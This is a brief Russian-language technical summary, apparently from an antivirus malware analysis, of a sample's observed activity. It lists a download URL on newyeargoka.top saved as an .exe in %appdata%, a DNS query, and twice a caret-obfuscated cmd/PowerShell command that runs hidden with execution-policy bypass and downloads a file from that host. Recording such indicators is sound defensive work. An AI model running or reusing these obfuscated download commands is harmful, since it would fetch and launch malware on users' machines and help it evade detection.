Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWershELL.EXe^ -exE^cuti^O^nP^o^LI^Cy Byp^A^ss -N^Op^RofI^L^e ^-w^i^N^D^OWs^tYl^e hI^ddEN^ (^New-^Ob^J^ECT ^sYST^eM.^NET.We^B^cli^EnT).^dO^Wn^LO^ADF^iLE('http://newyeargoka.top/read.p...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /c "PoWershELL.EXe^ -exE^cuti^O^nP^o^LI^Cy Byp^A^ss -N^Op^RofI^L^e ^-w^i^N^D^OWs^tYl^e hI^ddEN^ (^New-^Ob^J^ECT ^sYST^eM.^NET.We^B^cli^EnT).^dO^Wn^LO^ADF^iLE('http://newyeargoka.top/read.p...' (со скрытым окном)